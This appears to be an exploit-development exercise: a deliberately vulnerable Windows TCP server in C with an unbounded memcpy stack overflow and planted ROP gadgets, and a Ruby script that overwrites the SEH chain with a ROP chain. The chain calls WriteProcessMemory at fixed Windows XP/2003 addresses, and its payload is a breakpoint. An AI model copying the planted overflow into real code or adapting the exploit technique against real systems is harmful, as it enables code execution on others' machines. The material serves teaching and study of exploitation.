Created
September 6, 2012 12:05
PingPing Vulnerable Server
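/* Build-time configuration shared by the PingPing server and its monitor. */
#ifndef CONFIG_H   /* was _CONFIG_H: an identifier starting with '_' + uppercase is reserved for the implementation */
#define CONFIG_H

/* TCP port the server child listens on; it binds 0.0.0.0, i.e. every interface. */
#define CFG_SRV_PORT 8389
/* Named mutex; not referenced by the sources visible on this page. */
#define CFG_MUTEX TEXT("BatMan")
/* Argument the monitor passes to the child so it runs the server instead of the monitor. */
#define CFG_SRV_FLAG TEXT("-booyah")

#endif /* CONFIG_H */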
#include <tchar.h> | |
#include <winsock2.h> | |
#include <strsafe.h> | |
#include "Config.h" | |
#pragma comment(lib, "ws2_32") | |
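/* Debug tracing. Define __DEBUG to turn the DMSG* macros into message boxes;
 * otherwise they expand to empty statements. (__DEBUG is itself a reserved-style
 * name; it is kept because existing build flags may define it.) */
//#define __DEBUG

#ifdef __DEBUG
/* DMSG(x): show a fixed narrow string. */
#define DMSG(x) do { MessageBoxA(NULL, (x), ("MSG"), MB_OK); } while(0)
/* DMSG_V(fmt, ...): printf-style narrow message. StringCbPrintfA truncates to the
 * 1024-byte buffer and always terminates it. The scratch buffer is named
 * dmsg_str_ rather than __dmsg_str: names containing "__" are reserved. */
#define DMSG_V(x, ...) do { \
    CHAR dmsg_str_[1024]; \
    StringCbPrintfA(dmsg_str_, sizeof(dmsg_str_), x, __VA_ARGS__); \
    MessageBoxA(NULL, dmsg_str_, "MSG_V", MB_OK); \
} while(0)
/* DMSG_VW(fmt, ...): TCHAR variant; fmt must be a string literal because it is
 * wrapped in TEXT(). sizeof() is a byte count, which is what StringCb* expects. */
#define DMSG_VW(x, ...) do { \
    TCHAR dmsg_str_[1024]; \
    StringCbPrintf(dmsg_str_, sizeof(dmsg_str_), TEXT(x), __VA_ARGS__); \
    MessageBox(NULL, dmsg_str_, TEXT("MSG_VW"), MB_OK); \
} while(0)
#else
#define DMSG(x) do { } while(0)
#define DMSG_V(x, ...) do { } while(0)
#define DMSG_VW(x, ...) do { } while(0)
#endif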
/* Does nothing observable: control jumps straight to `bb` and the function
 * returns. The instruction sequences between the jmp and the label are never
 * executed; they exist only so that the built image contains those byte
 * sequences (the Ruby script on this page refers to them as ROP gadgets).
 * MSVC x86 inline assembly, so this only builds as a 32-bit target. */
static VOID RopGadget1()
{
    __asm {
        //int 3
        jmp bb                          // skip everything below
        add esp, 0x500
        ret
        mov eax, esp
        ret
        mov [esp], eax
        ret
        mov dword ptr [esp + 20], eax
        ret
        mov dword ptr [esp + 20], 0x500
        ret
    bb:
        nop
    }
}
/* Handle one client: send "PING\r\n", read a single message, and write the
 * text after the first space to ts.log. The socket is closed on every path
 * before returning. */
static VOID ProcessClient(SOCKET sock)
{
    HANDLE hFile;
    DWORD dw;                           /* bytes written by WriteFile; not checked */
    CHAR szTimeStamp[2048];             /* destination of the copy below */
    CHAR *ptr;
    static CHAR szBuffer[4096];         /* receive buffer; last byte kept as terminator */
    static DWORD __ebp1;                /* only used by the commented-out frame checks; reserved-style names */
    static DWORD __ebp2;
    // foooooo
    /*__asm {
    mov eax, [ebp]
    mov __ebp1, eax
    }*/
    DMSG("Processing client socket");
    if(send(sock, "PING\r\n", 6, 0) == SOCKET_ERROR)
        DMSG("Failed to send data");
    ZeroMemory(szBuffer, sizeof(szBuffer));
    ZeroMemory(szTimeStamp, sizeof(szTimeStamp));
    /* A return of 0 (peer closed) also passes this test; szBuffer is then all
     * zeros, strstr finds no space and nothing is logged. */
    if(recv(sock, szBuffer, sizeof(szBuffer) - 1, 0) != SOCKET_ERROR) {
        ptr = strstr(szBuffer, " ");
        if(ptr) {
            ptr++;
            /* The copy length is taken from the source (up to 4094 bytes),
             * not from the 2048-byte destination, so a message with more than
             * 2047 bytes after the space overruns szTimeStamp on the stack.
             * The defensive form is a bounded copy, e.g.
             * StringCchCopyA(szTimeStamp, sizeof(szTimeStamp), ptr). The
             * __except only runs if memcpy itself faults; an overrun that
             * faults nowhere is not detected here. */
            __try {
                memcpy(szTimeStamp, ptr, strlen(ptr));
            }
            __except(EXCEPTION_EXECUTE_HANDLER) {
                DMSG("Exception triggered while memcpy");
            }
            /* OPEN_ALWAYS leaves the file pointer at offset 0, so each client
             * overwrites the start of ts.log rather than appending. The path
             * is relative to the process's current directory. */
            hFile = CreateFile(TEXT("ts.log"), GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                               0, OPEN_ALWAYS, 0, 0);
            if(hFile != INVALID_HANDLE_VALUE) {
                WriteFile(hFile, szTimeStamp, strlen(szTimeStamp), &dw, 0);
                CloseHandle(hFile);
            }
        }
    }
    closesocket(sock);
    /*
    __asm {
    mov eax, [ebp]
    mov __ebp2, eax
    }
    if(__ebp1 != __ebp2) {
    DMSG("Corrupted EBP");
    ExitProcess(0);
    }*/
}
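/* Server child: bind CFG_SRV_PORT on every interface and hand each accepted
 * connection to ProcessClient in turn (single-threaded, so one slow client
 * stalls the rest). Returns -1 if Winsock, the socket, bind or listen fails;
 * the accept loop itself never returns. */
static INT SrvCore(void)
{
    WSADATA ws;
    SOCKADDR_IN sin;
    SOCKADDR_IN cin;
    SOCKET SrvSock;
    SOCKET CltSock;
    INT cinLen;

    if(WSAStartup(MAKEWORD(2,2), &ws)) {
        DMSG("Failed to initialize Winsock");
        return -1;
    }
    SrvSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(SrvSock == INVALID_SOCKET) {
        DMSG("Failed to create socket");
        WSACleanup();
        return -1;
    }
    ZeroMemory(&sin, sizeof(sin));      /* clear sin_zero padding as well */
    sin.sin_addr.s_addr = inet_addr("0.0.0.0");
    sin.sin_family = AF_INET;
    sin.sin_port = htons(CFG_SRV_PORT);
    if(bind(SrvSock, (SOCKADDR*) &sin, sizeof(sin))) {
        DMSG("Failed to bind port");
        closesocket(SrvSock);           /* previously leaked on this path */
        WSACleanup();
        return -1;
    }
    if(listen(SrvSock, 50) == SOCKET_ERROR) {
        DMSG("Failed to listen on socket");
        closesocket(SrvSock);
        WSACleanup();
        return -1;
    }
    while(TRUE) {
        /* accept() reads *addrlen on entry; it used to be passed
         * uninitialized, so the peer-address copy was unreliable. */
        cinLen = sizeof(cin);
        CltSock = accept(SrvSock, (SOCKADDR*) &cin, &cinLen);
        if(CltSock == INVALID_SOCKET) {
            DMSG_V("Failed to accept connection (%d)", WSAGetLastError());
            Sleep(1000);
            continue;
        }
        ProcessClient(CltSock);         /* closes CltSock */
    }
    return 0;
}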
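/* Supervisor half of the executable: re-launch this same binary with
 * CFG_SRV_FLAG whenever the server child exits, so a crash in SrvCore is
 * followed by a fresh process about a second later. Returns -1 only if the
 * module path or command line cannot be built; otherwise never returns. */
static INT SrvMonitor(void)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    TCHAR szExe[MAX_PATH + 1];
    TCHAR szCmdLine[MAX_PATH + 32];
    /* Dead code kept from an earlier variant that ran the child under an
     * account whose name and password were read in clear text from cred.txt
     * (LogonUserA / CreateProcessAsUser). If revived: the file needs a
     * restrictive ACL, and the password must not be echoed through DMSG_V. */
    /*
    CHAR szCreds[1024], *p;
    HANDLE hFile;
    HANDLE hToken, hProcess;
    DWORD dw;
    LUID luid;
    TOKEN_PRIVILEGES tp;
    hFile = CreateFile(TEXT("cred.txt"), GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
    if(hFile == INVALID_HANDLE_VALUE) {
        DMSG("Failed to open cred file");
        return -1;
    }
    ZeroMemory(szCreds, sizeof(szCreds));
    ReadFile(hFile, szCreds, sizeof(szCreds), &dw, 0);
    CloseHandle(hFile);
    p = strstr(szCreds, ":");
    if(!p) {
        DMSG("Invalid cred file format");
        return -1;
    }
    *p++ = '\0';
    if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES |
        TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID |
        TOKEN_READ | TOKEN_WRITE, &hToken)) {
        DMSG("Failed to open current token");
        return -1;
    }
    if(!LookupPrivilegeValue(0, SE_DEBUG_NAME, &luid)) {
        DMSG("Failed to lookup token priv");
        return -1;
    }
    tp.PrivilegeCount =1;
    tp.Privileges[0].Luid =luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    //DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, 0, SecurityIdentification, TokenPrimary, &hToken);
    if(!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), 0, 0)) {
        DMSG("Failed to adjust token priv");
        return -1;
    }
    if(!LogonUserA(szCreds, ".", p, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken)) {
        DMSG_V("Failed to logon server user (%s:%s): %d", szCreds, p, GetLastError());
        return -1;
    }
    */
    ZeroMemory(szExe, sizeof(szExe));
    if(GetModuleFileName(0, szExe, MAX_PATH - 1) == 0) {
        DMSG_V("Failed to get module path: %d", GetLastError());
        return -1;
    }
    DMSG("Entering server monitor loop");
    while(TRUE) {
        DMSG("Starting process");
        /* The path is quoted so a space in it does not split the command line. */
        if(FAILED(StringCchPrintf(szCmdLine, MAX_PATH + 32 - 1, TEXT("\"%s\" %s"), szExe, CFG_SRV_FLAG))) {
            DMSG("Failed to build command line");
            return -1;
        }
        ZeroMemory(&si, sizeof(si));
        ZeroMemory(&pi, sizeof(pi));
        si.cb = sizeof(si);
        if(!CreateProcess(0, szCmdLine, 0, 0, FALSE, 0, 0, 0, &si, &pi)) {
            //if(!CreateProcessAsUser(hToken, 0, szCmdLine, 0, 0, FALSE, 0, 0, 0, &si, &pi)) {
            DMSG_V("Failed to create process: %d", GetLastError());
            Sleep(5000);
            continue;                   /* pi is all zeros: nothing to wait on or close */
        }
        WaitForSingleObject(pi.hProcess, INFINITE);
        /* Both handles were previously leaked once per restart. */
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
        Sleep(1000);
    }
    return 0;
}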
/* Entry point. One executable, two roles: started with an argument (the
 * monitor passes CFG_SRV_FLAG) it runs the TCP server, SrvCore; started with
 * an empty command line it runs SrvMonitor, which keeps re-spawning the
 * server child. Note that any non-empty argument selects the server role,
 * not only CFG_SRV_FLAG. */
int APIENTRY wWinMain(HINSTANCE hInstance,
                      HINSTANCE hPrevInstance,
                      LPTSTR lpCmdLine,
                      int nCmdShow)
{
    const BOOL runAsServer = lstrlen(lpCmdLine) > 0;

    /* Presumably called only so the linker keeps RopGadget1 (a static
     * function) and its byte sequences in the image; it has no effect. */
    RopGadget1();
    //SrvCore();
    return runAsServer ? SrvCore() : SrvMonitor();
}
require 'socket'

# Address inside the target server image used by the chain below; fixed
# because the binary is loaded at a constant address — TODO confirm against
# the build it was taken from.
$base = 0x01401010
# Per-OS constants: the overwrite offset plus absolute addresses of two
# kernel32 routines. Absolute addresses mean the script only matches the exact
# OS builds listed here (no address randomisation); nothing is resolved at
# run time.
$vars = {
  :winxp_sp2 => {
    :off => 0x100, # ROP gadget [esp + 500h] / ret lands us here in ROP stack
    :wpm => 0x7c802213, # WriteProcessMemory
    :fic => 0x7c8355d4 # FlushInstructionCache
  },
  :win2k3_sp2_dc => {
    :off => 0x108,
    :wpm => 0x77e42365,
    :fic => 0x77e73347
  }
}
# Selects which $vars entry the get_* accessors return.
$os = :winxp_sp2
# Overwrite offset for the OS currently selected by $os.
def get_off; $vars[$os][:off]; end
# WriteProcessMemory address for the OS currently selected by $os.
def get_wpm; $vars[$os][:wpm]; end
# FlushInstructionCache address for the OS currently selected by $os.
def get_fic; $vars[$os][:fic]; end
# Returns exactly +size+ bytes: NOP (0x90) padding in front of a one-byte int3
# (0xCC) and 512 filler bytes. Raises if the fixed part alone exceeds +size+.
# The payload is a breakpoint plus filler, i.e. a debugger stop rather than
# functional code.
def get_shellcode(size)
  sc = "\xcc" + ("K" * 512)
  raise "Error" if sc.size > size
  ("\x90" * (size - sc.size)) + sc
end
# Assembles the stage placed at the overwrite offset. Every value is an
# absolute address: the 0x0140xxxx entries point into the server binary (the
# byte sequences in RopGadget1 of the C source on this page), the get_wpm /
# get_fic entries into kernel32 for the selected OS. The result is therefore
# tied to one build of the server and one OS build; the comments on each
# entry are the author's.
def get_rop()
  [
    0x0140146C, # mov eax, esp / ret
    0x01401465, # add esp, 500h / ret
  ].pack('V*') +
  get_shellcode(0x500) +
  [
    0x01401473, # mov [esp + 16 + 4], eax / ret
    0x01401478 # mov [esp + 16], 500h] / ret
  ].pack('V*') +
  [
    get_wpm, # WriteProcessMemory
    get_fic, # FlushInstructionCache
    0xffffffff, # handle
    $base, # addr to write
    0x45454545, # addr to read
    0x46464646, # bytes to read
    $base # bytes written
  ].pack('V*') +
  [
    $base + 4,
    0xffffffff,
    $base,
    0x01010101
  ].pack('V*')
end
# Script entry: connect to the server on localhost (there is no target
# argument), discard its "PING" banner, and send one message whose text after
# the first space is far longer than the server's 2048-byte szTimeStamp
# buffer. The layout (offset, SEH record position, 5000-byte total) is
# specific to this build of the server.
if __FILE__ == $0
  sock = TCPSocket.new("127.0.0.1", 8389)
  sock.recv(10000)
  buf = "HELLO "
  buf << "J" * get_off()
  buf << get_rop()
  buf << "B" * (0x80c - buf.size + 6)
  buf << "ZZZZ" # (SEH Chain)
  buf << [0x01401465].pack('V') # (SEH handler) stack pivot
  buf << "\x90\x90\x90\x90"
  buf << "\x90\x90\x90\x90"
  buf << "C" * (5000 - buf.size)
  sock.send(buf, 0)
  sock.close
end